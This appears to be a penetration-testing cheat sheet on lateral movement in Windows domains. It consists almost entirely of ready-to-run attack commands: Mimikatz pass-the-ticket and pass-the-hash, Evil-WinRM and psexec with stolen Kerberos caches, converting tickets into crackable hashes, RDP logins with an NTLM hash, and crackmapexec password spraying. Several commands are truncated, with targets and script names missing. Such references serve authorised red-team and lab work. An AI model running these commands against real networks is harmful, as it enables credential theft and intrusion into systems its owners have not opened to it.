Lateral Movement

There aren't many ways to move laterally on windows. Below are the main ones.

  • psexec

  • RDP

  • WinRM

  • SSH(not likely)

PTH(pass the hash) can be used most of the time.

Mimikatz Ticket PTT

mimikatz.exe '" kerberos:ptt C:\Users\Public\ticketname.kirbi"' "exit"
Enter-PSSession -ComputerName ECORP


$pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('ECORP.local\morph3', $pass)
Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }

# Evil-WinRM
ruby evil-winrm.rb -i -u morph3 -p morph3 -r evil.corp

PTH with Mimikatz

Invoke-Mimikatz -Command '"sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:command"'

Pass The Ccache (PTC)

Grab the ccache from remote and put into environment variable

export KRB5CCNAME=/home/morph3/Desktop/krb5cc_012345678_XXXX

Make sure the times are synced up with the DC

sudo ntpdate -u

Psexec to the target

impacket-psexec morph3@dc01.domain.local -dc-ip -k -no-pass

** Don't include domain name in psexec. If you are having issues with the command you may remove the username as well.

Cracking Ccache

Convert the ccache file into kirbi file using a converter.

python2 /opt/ticket_converter/ krb5cc_012345678_XXXX ticket.kirbi

Convert kirbi to crackable hash.

python3 /opt/kerberoast/ ticket.kirbi | tee ticket_hash.txt


Impacket's script is good.

impacket-rdp_check morph3:Password123@
python3 /opt/impacket/examples/ ecorp/morph3@
xfreerdp /u:morph3 /p:Password123 /v:
xfreerdp /u:morph3  /pth:08df3c74ded740e1f2bcf5dea4b8daf6  /v:
rdesktop -u Administrator -p 123456


Swiss-knife tool for password spraying.

crackmapexec smb ./ips.txt -u ./users -H hashes --local-auth
crackmapexec smb  -u ./users -p ./passwords --continue-on-success --shares

Last updated